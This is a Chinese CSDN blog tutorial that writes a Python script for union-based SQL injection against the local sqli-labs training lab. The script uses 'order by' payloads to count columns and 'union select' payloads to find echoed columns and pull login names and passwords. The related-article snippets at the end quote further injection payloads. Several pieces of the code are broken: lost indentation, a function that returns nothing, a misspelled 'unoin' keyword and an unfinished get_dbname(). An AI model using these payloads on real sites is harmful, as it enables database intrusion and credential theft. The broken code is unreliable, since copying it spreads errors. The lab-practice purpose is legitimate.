sql回显注入--python脚本

最新推荐文章于 2024-06-21 02:24:19 发布
最新推荐文章于 2024-06-21 02:24:19 发布
阅读量820 收藏 5
点赞数 2
分类专栏: Python应用 Web安全 SQL注入 文章标签: python 正则表达式 sql回显注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46684578/article/details/118757392
版权
本文详细介绍了Python基础、网络请求及如何利用Python进行SQL注入攻击的实战,包括bool盲注的测试、数据提取、列数判断和回显位置确定。通过示例代码展示了如何构造联合查询来定位数据回显位置,为理解SQL注入提供了一个清晰的实践指南。
摘要由CSDN通过智能技术生成

sql回显注入--python脚本

联合查询注入python脚本
功能:

  1. 页面能否正常请求
  2. 判断列数
  3. 判断回显位置

1. python基础

1.1 数据

数据类型

  1. 整数

  2. 浮点数

  3. 字符串

  4. c’ “abc”
    #单引号或双引号都可以

  5. 布尔型

  6. 数据集合

    t #数组
    didt,tuple,set

数据转换

1.2 系统模块

  1. os模块

  2. sys模块

  3. re模块

    表达式
    re.findall()
    #贪婪匹配
    (.*?)

  4. 文件操作

    读--方式1
	f=open('1.txt','r')
	for line in f
		print(line.strip())
	f.close()
读--方式2
	f1=open('1.txt','r')
	print(f1.read())
	f1.close()
读--方式3
	with open('1.txt','r') as f1:
		print(f1.read())
	f1.close()
 写
	f=open('1.txt','a+')
	f.write('\n123') 
	f.close()

2. python web网络请求

2.1 请求中的参数

def req(url,params):     	#定义请求函数

	url
	params  #请求参数,一般在url后面;例如id=1

3. bool盲注–python编写过程

3.1 测试是否能正常请求页面

import re
import requests

def req(url,params):     	#定义请求函数
reponse=requests.get(url=url).text        # .text---以文本的形式呈现
return reponse

if  __name__ == '__main__':
url='http://127.0.0.1/sqli-labs-master/Less-1/?id=1'
print(req(url))

3.2 获取数据–用正则表达式

import re
import requests

def req(url,params):
reponse=requests.get(url=url,params=params).text        # .text---以文本的形式呈现
return reponse

if  __name__ == '__main__':
url='http://127.0.0.1/sqli-labs-master/Less-2/'

for i in range(1,10):
    params = {'id': i}                                  #请求参数,一般在url后面;例如id=1
    reponse = req(url, params)
    a = re.findall('Your Login name:(.*?)<br>', reponse)   	#正则表达式--找login name
    b = re.findall('Your Password:(.*?)</font>', reponse)   	#正则表达式--找password
    print(a)
    print(b)

3.3 判断行数

def order_by(url):
    for i in range(1,10):
        key='order by %d' %(i)
        payload = "1 "+key +"#"     #在url后面构造payload;也就是构造params;
        params = {'id':payload}
        reponse=req(url,params)
        if 'Your Login name:' in reponse:
            print('有第%d列' %(i))
        else:
            print('没有第%d列' %(i))
    reponse = req(url, params)

3.4 判断回显位置–构造联合查询

def back_location(url):
    key = 'union select %d' %(1)
    for i in range(1,order_by(url)):         #需要得到列数,然构造联合查询
        key = key+",%d"%(i+1)
	#print(key) 	测试的时候用
    payload = "-1 "+key+" # "
    params = {'id':payload}
    reponse=req(url,params)
    a = re.findall('Your Login name:(.*?)<br>', reponse)       # 正则表达式--找login name
     	# 因为注入位置正确,页面上就会显示Your Login name:xxx;根据回显的信息判断回显位置
    b = re.findall('Your Password:(.*?)</font>', reponse)      #正则表达式--找password
    c = {'回显列-1':a,'回显列-2':b}
    return c

4. 源代码

import re
import requests

def req(url,params):
    reponse=requests.get(url=url,params=params).text        # .text---以文本的形式呈现
    return reponse

def order_by(url):
    for i in range(1,10):
        key='order by %d' %(i)
        payload = "1 "+key +"#"     #在url后面构造payload;也就是构造params;
        params = {'id':payload}
        reponse=req(url,params)
        if 'Your Login name:' in reponse:
            continue
            #print('有第%d列' %(i))
        else:
            break
            #print('没有第%d列' %(i))
    return i-1;

def back_location(url):
    key = 'union select %d' %(1)
    for i in range(1,order_by(url)):         #需要得到列数,然构造联合查询
        key = key+",%d"%(i+1)
    #print(key)
    payload = "-1 "+key+" # "
    params = {'id':payload}
    reponse=req(url,params)
    a = re.findall('Your Login name:(.*?)<br>', reponse)  # 正则表达式--找login name
    b = re.findall('Your Password:(.*?)</font>', reponse)  ##正则表达式--找password
    c = {'回显列-1':a,'回显列-2':b}
    return c

def get_dbname():
    key = "unoin select 1,(),3"
    payload = "-1 "+key+" # "
    params = {'id':payload}
    reponse=req(url,params)

if  __name__ == '__main__':
    url='http://127.0.0.1/sqli-labs-master/Less-2/'

params = {'id': 1}                                  #请求参数,一般在url后面;例如id=1
reponse = req(url, params)
a = re.findall('Your Login name:(.*?)<br>', reponse)   		#正则表达式--找login name;返回的是一个数组
b = re.findall('Your Password:(.*?)</font>', reponse)   	#正则表达式--找password

aa = a[0]
print(aa)
#print('列数:%d' % (order_by(url)))
#print(back_location(url))
牛顿编程
关注
专栏目录
26-5 SQL 注入攻击 - 利用dnslog带回回显信息范例
weixin_43263566的博客
03-14 317
因此,这个 payload 的目的是利用 SQL 注入漏洞,尝试加载指定路径下的文件内容,并将结果返回给攻击者。这个 payload 旨在利用盲注漏洞来执行 SQL 查询,通过。目标:使用 DVWA 的盲注作为靶机,获取数据库信息。函数加载数据库中的内容,并将结果返回给攻击者。
《网络安全自学教程》- SQL注入之时间盲注原理+步骤+实战操作
热门推荐
wangyuxiang946的博客
05-21 1万+
这篇文章为大家解析时间盲注的实现原理,结合实战案例讲解时间盲注的操作步骤以及时间误差的判断
基于pythonsql注入脚本
03-04
适合刚学pythonsql注入的人 import urllib2 import re
SQL注入自动化python脚本
CMACCKK
08-10 3611
写了一个python3注入sql脚本 临近毕业,尝试写一些自动注入和自动扫描的脚本 发现还是不够自动 后面我再改改。现在脖子疼 实现效果 代码如下: import requests from bs4 import BeautifulSoup from colorama import init, Fore, Back, Style import sys import time import urllib.parse import re from prettytable import PrettyTab
sql注入种类以及测试方式和python脚本
欢迎来到神林的博客
04-26 3156
sql 注入: 1.sql注入最重要的过程,单引号判断注入最常见。 分为三大类:get、post、cookie 简单判断get型: http://host/test.php?id=100’ 返回错误说明有可能注入 http://host/test.php?id=100 and 1=1 返回正常 http://host/test.php?id=100 and 1=2返回错误 如果出现以上三种错...
【ctf】基于python脚本sql注入合集(持续更新)
woodwhale的博客
05-14 6318
基于python脚本sql注入合集(持续更新) 前言 sql注入在ctf的web方向中是常见提醒。简单的sql注入sqlmap跑一跑自然而然就跑出来了。这篇文章是针对sqlmap跑起来困难的题目,也就是用python脚本来跑的题目。 那么这种写脚本的题目也有不同的注入方式,例如布尔盲注、时间盲注、异或注入等等,都是通过写脚本来获取sql信息的。这篇文章就写下我认为比较有价值的写脚本题型! 布尔盲注 分析题目 N1BOOK [第一章 web入门]SQL注入-2 这题其实有很多解法,这里我选择比较简答的
手把手教你用Python轻松玩转SQL注入——渗透利器
pyjishu的博客
03-25 2259
前言 大家好,我是黄伟。相信大家经常有听到过SQL注入啥的,但是并不是特别了解;小编以前就是经常听别人说,但是自己啥都不懂,直到后来看了相关教材后才明白,原来是这么个东西,那么到底是什么东西了,又或者是不是个东西了?我们接着往下看。 一、浅谈SQL注入 SQL注入其实就是把SQL命令插入到WEB表单中提交或者输入一些页面请求的查询字符串,比如我们输网址,就是相当于这种操作,只不过我们不是在测试SQL注入漏洞,而仅仅只是为了输入后看到相应网页上的内容而已。一般方法有,如:猜数据表名,其次就是绕过后.
sql注入pythonpoc_DVWA SQL-injection 附python脚本
weixin_39896256的博客
12-17 397
SQL-Injectionlow等级首先我们将dvwa等级调到low 如图接下来选择SQL Injection,并在提交框中输入正常值1,查看返回结果接下来检测是否存在注入,分别输入 1' and 1=1 1' and 1=2 当我们输入1' and 1=1时,发现报错页面,提示我们语句没有闭合,所以我们输入1' and '1'='1和 1' and '1'='2得到如上回显信息说明存在注入...
WEB入门——SQL注入(一)
HasntStartIsOver的博客
06-03 1315
简单的SQL注入
sql注入-不同数据类型注入
xiaoheizi的博客
06-28 345
原因是程序员为了防止SQL注入,就会调用几种转义函数,将单引号或双引号进行转义操作,转义无非便是在单或双引号前加上斜杠(\)进行转义 ,但这样并非安全,因为数据库使用的是宽字节编码,两个连在一起的字符会被当做是一个汉字,而在PHP使用的UTF8编码则认为是两个独立的字符,如果我们在单或双引号前添加一个字符,使其和斜杠(\)组合被当作一个汉字,从而保留单或双引号,使其发挥应有的作用。可以发现就算闭合了【''】依然无法注入成功,是因为我们输入的【'】被在前加上斜杠(\)进行了转义,无法发挥作用。
注入脚本
weixin_34067102的博客
05-22 824
转载于:https://www.cnblogs.com/AtesetEnginner/p/10906975.html
基于报错注入Python代码
3569
06-25 978
能够爆数据库,表,和字段的 简单的报错注入Python代码import re import sys import requests import binascii def Get_db(url): url_dbs_num = url + "?id=' union select 1 from (select count(*),concat(floor(rand(0)*2),0x3a3a3a,
SQL注入---联合注入
qq_41592307的博客
09-03 272
Union联合注入攻击 1、联合注入的思路(会显示输出内容时,才考虑使用Union注入) (可以在输入框中或者URL中输入内容,如果不能在输入框内输入内容,则需要使用Burp suite使用 重发器,修改id中的内容进行爆破数据) 判断是否存在SQL注入点(判断注入的类型) 使用 order by 1-99 语句来检测数据表的字段数量 1.字符型 2.整数型 判断输出的位置,通过联合查询,union select 字段数 ...
SQL注入之union联合注入
hobby云说
06-12 3700
特别申明 本文章仅供学习使用,其余利用本文章内容进行的任何行为与本人无关!做任何渗透操作前,请一定三思,做个遵纪守法的好公民! 简介 在初见SQL注入提到三种分类方式,其中一个是根据注入是否有回显来进行分类,本文将详细讲解有回显这类的注入方式。有有回显注入,顾名思义,程序会将后端执行SQL查询语句的结果,返回显到页面中,通过各种巧妙的方式让各种你想要知道的关键信息显示在页面中。有回显注入常见的有联合注入和报错注入,本文将详细讲解union联合注入。 正文 ...
SQL注入之union 联合注入
weixin_53711701的博客
01-16 5001
SQL注入之union联合注入
SQLi LABS Less 27a 联合注入+布尔盲注+时间盲注_sqli-labs第27a关
2401_84254343的博客
06-21 697
需要注意的是,关键字只过滤了union、UNION、Union,这三种形式,可以使用其他的大小写组合绕过。这一关是查询功能,地址栏输入id作为参数,后台根据id查询用户数据,并在前端页面显示出来。确定第一个字符的内容后,再按照此方法判断其余字符,为了提高效率,稍后使用脚本去枚举。参数中添加双引号,页面异常(空)显示,说明后台隐藏了报错信息,不适合报错注入。字符的ASCLL码肯定大于1,所以页面正常显示,确定payload可用;输入不同的参数,页面会动态显示对应的用户数据,可以考虑联合注入
python--正则表达式匹配密码
qq_52360788的博客
11-20 2297
快考试了,一些太复杂的正则表达式咱在开发中都是直接copy,但是考试就没有办法copy了,这时候,我们可以使用re模块中的findall()函数来将要求分别进行匹配,这倒也不失为一种方式,尽管麻烦了一点,但也能写出来 def patchPassWord(password:str): ''' 检查密码标准: 1、至少[a-z]之间至少要有一个字母 2、[A-Z]之间至少要有一个字母 3、[0-9]之间至少要有一个数字 4、[@#$]之间至少有一个字符
sql注入联合注入
m0_59576693的博客
09-19 674
sql联合注入联合注入细节以及联合注入流程和联合注入payload
python注入_Python安全编码 — 代码注入的实践与防范
weixin_39626298的博客
12-04 818
什么是代码注入代码注入攻击指的是任何允许攻击者在网络应用程序中注入代码,从而得到解读和执行的方法。Python中常见代码注入能够执行一行任意字符串形式代码的eval()函数eval("__import__('os').system('uname -a')")能够执行字符串形式代码块的exec()函数exec("__import__('os').system('uname -a')")反序列化一个...
antdesign的日期控件回显2024-09-25报错
最新发布
10-01
Ant Design 的日期选择组件在回显特定日期如 `2024-09-25` 时可能会遇到错误,这通常是因为浏览器对未来的日期设置有限制,而 `2024-09-25` 还未到来,因此组件在渲染时识别为无效或未来日期,导致校验失败或显示...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

牛顿编程

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值